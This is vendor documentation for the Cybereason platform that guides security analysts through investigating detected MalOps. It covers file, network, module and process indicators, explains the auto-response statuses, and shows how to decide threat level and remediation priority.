Analyze MalOps and Determine Threat Level

When the Cybereason platform creates a MalOp, the MalOp represents a highly likely instance of malicious behavior. As a result, you want to fully analyze the processes, files, connections, machines, users, and other Elements associated with the MalOp to fully understand what is occurring in your environment.

This topic presents guidelines for investigating the details included with MalOps so you can better respond to the behaviors that present the biggest threat to your organization.

Investigate MalOp properties

To determine if a MalOp presents a threat to your organization, consider the properties listed in this section.

You can view information about a MalOp’s properties from:

  • The Malop details screen: Access the Malop details screen for a MalOp by clicking the MalOp on the Malops management screen.

  • The Investigation screen’s Element details pane: Search for the items associated with the unknown malware or access the Investigation screen straight from the MalOp’s Malop details screen. Click an item in the Investigation screen’s results grid to view the Element details pane.

Each MalOp type requires a different approach to investigation. See the Investigation column in the tables in the Malop Types and Components topic to learn which of the following properties to focus on based on MalOp type.

Files

Start by looking at the general properties associated with the files included in the MalOp:

Investigation Area

Description

File Name and Attributes

Look at file name and attributes. For .exe files, the Cybereason platform reports a number of important details:

  • Process names and IDs running from a file

  • Creation and end times

  • Command line information used by the process from this file

  • Details about the image file (for processes)

  • Extension type of the file

  • Path to the file

  • Signature details

  • Product names and types, and the company names for the file

Suspicious data for any of these indicators shows a possibly malicious file worth investigating further.

Suspicions and evidence

Did the Cybereason platform associate any evidence or suspicions with this file?

Signature

Is the file signed and by whom? Anomalies in the signature can often be a sign of potentially malicious behavior

File location

Is the file in a suspicious folder, such as the /temp, AppData, ProgramData folders? If a file runs from locations such as these, this is a suspicious indicator.

Reputation

What is the file’s reputation? Based on the file’s reputation you may want to look further.

The file details in the following image from the Element Details screen point to malicious activity because the file is unsigned and running from the temp folder.

File Malop Triage

Network

Every MalOp includes relevant network information in the Communication tab of the MalOp. Investigate these properties to see potentially malicious behavior on the network

When analyzing the network properties, ask yourself questions such as:

Investigation Area

Description

Network connections

Ask questions about the communication and connections, including:

  • Are there network connections? Internal or external connections?

  • How long are the connections?

  • Is there data transmitted through these connections? How much?

  • What port type is used in these connections?

  • What direction is the communication?

If you find unexpected answers to these questions, you need to investigate further into such connections.

Listening connections

Is there a listening connection or port on a process?

DNS requests

Investigate both resolved and unresolved DNS requests. Make sure that the behavior of these requests are expected or not.

Processes

What processes are performing the connections? Should they be?

For example, the details in the following image suggest suspicious activity because a machine is connecting to port 4444, which is the default port for Metasploit’s meterpeter. In addition, we see these two machine transferring data.

Network Malop Triage

Module

For each MalOp, investigate the modules included with the processes running as part of the MalOp. The MalOp details report the loaded modules associated with the malicious process. However, to view details about the modules, you must use the Investigation screen, either through the MalOp details or independently.

When analyzing modules, ask yourself questions such as:

Investigation Area

Description

Module properties

What are the properties of the module or modules? Your Cybereason platform reports a number of details, including:

  • Names and addresses

  • Header and allocated properties values

  • Whether the header is a malformed executable header

  • Characteristics of the module

  • General file details

Scan these properties to check if you find suspicious indicators in the properties list.

Floating modules

Is the module floating? If you answer Yes, check the protection details for mismatches.

Processes

What processes are using these modules? Should they be using them?

Intelligence

Is this a known module when you search for it on the internet?

In general, the more common the module, the less likely it is to be malicious.

Process

For each MalOp, the Cybereason platform collects a variety of information about the processes involved in the associated activities. The Malop Inbox reports the process details in the Processes tab of the MalOp details.

When analyzing the process properties, ask question such as:

Investigation Area

Description

Process details

Scan the collected process details including:

  • The file associated with the process

  • The total time for the process

  • Start and end times for the process

Suspicions and evidences

What suspicions and evidences are associated with the process?

Process type

What type of process is it - an OS process? 3rd party process?

It is also a good idea to look at the product type for the process.

Command line

What is the command line returned for the process? Many malicious behaviors originate from command line arguments so be sure to check these closely.

Process behaviors

Does the process create other ways to persist itself, such as registry entries, scheduled tasks, services, or child processes? Does this process has a suspicious parent process? Is it an injected process?

In addition, for all processes, you can view the Attack Tree to see how the process fits with other processes in your environments. For details on the Attack Tree, see Hunt with the Attack Tree.

The process details in the following image point to suspicious activity because, while the process claims to be from Microsoft, it is not signed by Microsoft. Additionally, the process is running from a temp folder and has an unknown reputation.

Process Malop Triage

Analyze the Auto response status

For Endpoint Protection MalOps generated by Cybereason’s EPP features, look at the Malops management screen’s Auto response column. The Auto response column provides information on how Cybereason’s NGAV feature has responded to the incident, and helps you decide how to respond to it. The following table includes status descriptions, which types of malware are associated with each status, and suggested actions to take.

Malware status

Description

Malware types

Suggested actions to take

Disinfected

Malware was detected and the malicious file was disinfected.

In cases where it was not possible to disinfect the file, the file is removed from the machine. Note: in this case, the file is not quarantined, it is completely removed from the machine.

Known

No additional action is required.

Failed to disinfect

Malware was detected and prevented, but Anti-Malware could not disinfect or remove the file.

Known

Access the machine and remove the malware.

Detected

Malware was detected but no action was taken to prevent it.

Unknown, Fileless

Investigate the malware to determine if it is indeed malicious. If it is, access the machine and remove the malware.

Prevented

Malware was detected and prevented.

Known, Unknown, Fileless

No additional action is required.

Done

A user (analyst) has marked the malware as done

All types

No additional action is required.

Excluded

A user (analyst) has marked to exclude the malware. The malware is ignored by Anti-Malware on all endpoints.

All types

No additional action is required.

Deleting on restart

Malware was detected and prevented. It will be removed upon restart.

Known

No immediate action is required. Follow this MalOp to ensure the status becomes ‘Disinfected’ after restart, indicating that the malware was indeed removed.

Quarantined

Malware was detected and the malicious file was quarantined.

Malware MalOps marked with the ‘Quarantined’ Auto response label indicate that the Cybereason platform has moved the malicious file to a different location to prevent it from executing. Quarantined files are placed in the following folder location:

  • Windows: C:\ProgramData\apv2\Quarantine

  • Mac: /usr/local/cybereason

  • Linux: /opt/cybereason/sensor/Quarantine

Cybereason deletes quarantined files after 30 days. The cleanup is scheduled to run daily (every 24 hours) and on sensor startup.

Note

The Quarantined status is relevant only for malware triggered by Artificial Intelligence analysis and behavioral document protection.

Unknown

No additional action is required.

Determine the threat level

After you investigate your MalOp, you need to consider all the answers together to determine if the behavior is malicious and requires further remediation.

When deciding how, or in what order, to address MalOps you have deemed a threat to your organization, consider:

  • The significance of the machines involved in the suspicious activities. Address machines that are more vital machines to your organization first.

  • The significance of the behavior. Severe activities should be address before other, less severe activities.

  • The significance of the users involved. Certain users may be more compromised than others. For example, suspicious activity on a CEO’s computer or on a machine with sensitive material is important to address immediately.

If you found several suspicious behaviors, it is likely you are dealing with an attack. If only one property is suspicious, the behavior may be benign.

Based on your responses to these answers, you may need to escalate MalOps, remediate potential threats, or exclude benign behaviors. See Manage the MalOp Workflow, Remediate MalOps, and Manage False Positives for more information.